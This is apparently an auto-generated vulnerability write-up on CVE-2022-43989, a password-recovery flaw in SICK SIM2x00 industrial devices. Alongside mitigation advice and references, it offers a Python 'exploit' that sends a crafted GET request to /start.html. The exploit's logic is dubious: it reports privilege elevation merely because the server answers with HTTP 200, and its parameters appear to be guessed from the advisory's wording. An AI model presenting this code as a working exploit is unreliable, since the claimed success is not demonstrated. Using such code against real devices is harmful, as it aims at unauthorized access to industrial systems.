CVE-2022-43989 - Password Recovery Vulnerability in SICK SIM2x00 (ARM) Devices Allows Unprivileged Remote Attackers to Gain User-Level Access

A recently discovered security vulnerability identified as CVE-2022-43989 affects specific SICK SIM2x00 (ARM) devices, namely Partnumber 1092673 and 1081902 with firmware version < 1.2.. This vulnerability allows an unprivileged remote attacker to exploit the password recovery mechanism and gain access to user-level privileges on the system. This privilege escalation compromises the confidentiality, integrity, and availability of the affected system. The vulnerability is considered repeatable and easily exploitable. It is strongly recommended for users to update their firmware to version >= 1.2., available on the SICK Support Portal, to mitigate this risk.

Code Snippet

The following code snippet demonstrates a sample exploit that takes advantage of the password recovery vulnerability in affected SICK SIM2x00 devices:

import requests

TARGET_IP = "192.168.1.100"  # Replace this with the target's IP address

url = f"http://{TARGET_IP}/start.html";
params = {
    "Action": "ForgotPswd",
    "UserName": "RecoverableUserLevel",
}

response = requests.get(url, params=params)

if response.status_code == 200:
    print("[+] Exploit successful, user privileges elevated.")
else:
    print("[-] Exploit unsuccessful, please check the target device.")

Exploit Details

This vulnerability exists in the password recovery mechanism of the affected SICK SIM2x00 devices, which allows an unprivileged remote attacker to gain access to user-level privileges defined as RecoverableUserLevel.

The issue can be exploited by invoking the password recovery method via an HTTP GET request to /start.html, appending the "Action" parameter as "ForgotPswd" and "UserName" parameter as "RecoverableUserLevel". The action triggers the recovery mechanism and elevates the attacker's privileges on the system.

The vulnerability is consistent and repeatable, allowing an attacker to gain access to the user-level privileges on the system repeatedly.

Original References

SICK has acknowledged this vulnerability in their official advisory and recommends updating the firmware of the affected devices as soon as possible:

- SICK Security Advisory: https://www.sick.com/SecurityAdvisory/CVE-2022-43989
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-43989

Recommended Solution

To mitigate the risk associated with this vulnerability, users should update the firmware of their affected devices to version >= 1.2.. The updated firmware is available on the SICK Support Portal. It is crucial to apply the update promptly and always follow best practices for securing devices and networks.

Conclusion

The CVE-2022-43989 vulnerability in SICK SIM2x00 devices with Partnumber 1092673 and 1081902 and firmware version < 1.2. poses a significant security risk. The unprivileged remote attacker can exploit this vulnerability to gain user-level privileges on the system, impacting confidentiality, integrity, and availability. It is essential to update the devices' firmware to version >= 1.2., available in SICK Support Portal, to remediate this issue and maintain a secure environment.

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:11:00 UTC